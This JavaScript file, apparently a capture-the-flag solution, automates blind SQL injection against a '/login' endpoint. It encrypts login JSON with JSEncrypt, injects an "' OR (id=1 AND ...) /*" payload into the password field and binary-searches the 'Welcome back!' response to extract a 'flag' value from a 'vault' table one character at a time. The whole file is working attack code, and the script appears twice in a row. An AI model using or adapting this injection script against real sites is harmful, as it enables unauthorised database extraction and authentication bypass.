LoadLow/blind_sqlite.js

## blind_sqlite.js
var encrypt = new JSEncrypt();
encrypt.setPublicKey($('#pubkey').val());

var fnd = false;

for(var i = 0; i < 1000; ++i) {
    var asciimin = 0x20;
    var asciimax = 126

    var min;
    var max;

    var foundvalue = "";
    for(; foundvalue.length < 1000;) {
        min=asciimin;
        max=asciimax;

        var remainingchars = foundvalue.length - 1;
        var nextchar = foundvalue.length + 1;

        console.log("Searching " + foundvalue + "...");
        for(;;) {
            var pivot = parseInt(((min + max)/2));

            var pld = '((SELECT substr(flag,'+ (nextchar) +', 1) FROM vault)=CHAR('+pivot+'))';

            var jsonlogin = {
                "email": 'admin',
                "passwd": "' OR (id=1 AND "+ pld + ") /*"
            }

            var encrypted = encrypt.encrypt(JSON.stringify(jsonlogin));
            var result = $.ajax({
              type: 'POST',
              url: '/login',
              data: {encrypted:encrypted},
              async:false
            });

            if(result.responseText.includes('Welcome back!')) {
                foundvalue += String.fromCharCode(pivot);
                break;
            }

            pld = '((SELECT substr(flag,'+ (nextchar) +', 1) FROM vault)>=CHAR('+ min +'))';

            jsonlogin = {
                "email": 'admin',
                "passwd": "' OR (id=1 AND "+ pld + ") /*"
            }
            encrypted = encrypt.encrypt(JSON.stringify(jsonlogin));
            result = $.ajax({
              type: 'POST',
              url: '/login',
              data: {encrypted:encrypted},
              async:false
            });

            pld = '((SELECT substr(flag,'+ (nextchar) +', 1) FROM vault)<CHAR('+ pivot +'))';

            jsonlogin = {
                "email": 'admin',
                "passwd": "' OR (id=1 AND "+ pld + ")/*"
            }
            encrypted = encrypt.encrypt(JSON.stringify(jsonlogin));
            var result2 = $.ajax({
              type: 'POST',
              url: '/login',
              data: {encrypted:encrypted},
              async:false
            });

            if (result.responseText.includes('Welcome back!') && result2.responseText.includes('Welcome back!'))
                max=pivot-1;
            else
                min=pivot+1;

        }
    }
}
	var encrypt = new JSEncrypt();
	encrypt.setPublicKey($('#pubkey').val());

	var fnd = false;

	for(var i = 0; i < 1000; ++i) {
	var asciimin = 0x20;
	var asciimax = 126

	var min;
	var max;

	var foundvalue = "";
	for(; foundvalue.length < 1000;) {
	min=asciimin;
	max=asciimax;

	var remainingchars = foundvalue.length - 1;
	var nextchar = foundvalue.length + 1;

	console.log("Searching " + foundvalue + "...");
	for(;;) {
	var pivot = parseInt(((min + max)/2));

	var pld = '((SELECT substr(flag,'+ (nextchar) +', 1) FROM vault)=CHAR('+pivot+'))';

	var jsonlogin = {
	"email": 'admin',
	"passwd": "' OR (id=1 AND "+ pld + ") /*"
	}

	var encrypted = encrypt.encrypt(JSON.stringify(jsonlogin));
	var result = $.ajax({
	type: 'POST',
	url: '/login',
	data: {encrypted:encrypted},
	async:false
	});

	if(result.responseText.includes('Welcome back!')) {
	foundvalue += String.fromCharCode(pivot);
	break;
	}

	pld = '((SELECT substr(flag,'+ (nextchar) +', 1) FROM vault)>=CHAR('+ min +'))';

	jsonlogin = {
	"email": 'admin',
	"passwd": "' OR (id=1 AND "+ pld + ") /*"
	}
	encrypted = encrypt.encrypt(JSON.stringify(jsonlogin));
	result = $.ajax({
	type: 'POST',
	url: '/login',
	data: {encrypted:encrypted},
	async:false
	});

	pld = '((SELECT substr(flag,'+ (nextchar) +', 1) FROM vault)<CHAR('+ pivot +'))';

	jsonlogin = {
	"email": 'admin',
	"passwd": "' OR (id=1 AND "+ pld + ")/*"
	}
	encrypted = encrypt.encrypt(JSON.stringify(jsonlogin));
	var result2 = $.ajax({
	type: 'POST',
	url: '/login',
	data: {encrypted:encrypted},
	async:false
	});

	if (result.responseText.includes('Welcome back!') && result2.responseText.includes('Welcome back!'))
	max=pivot-1;
	else
	min=pivot+1;

	}
	}
	}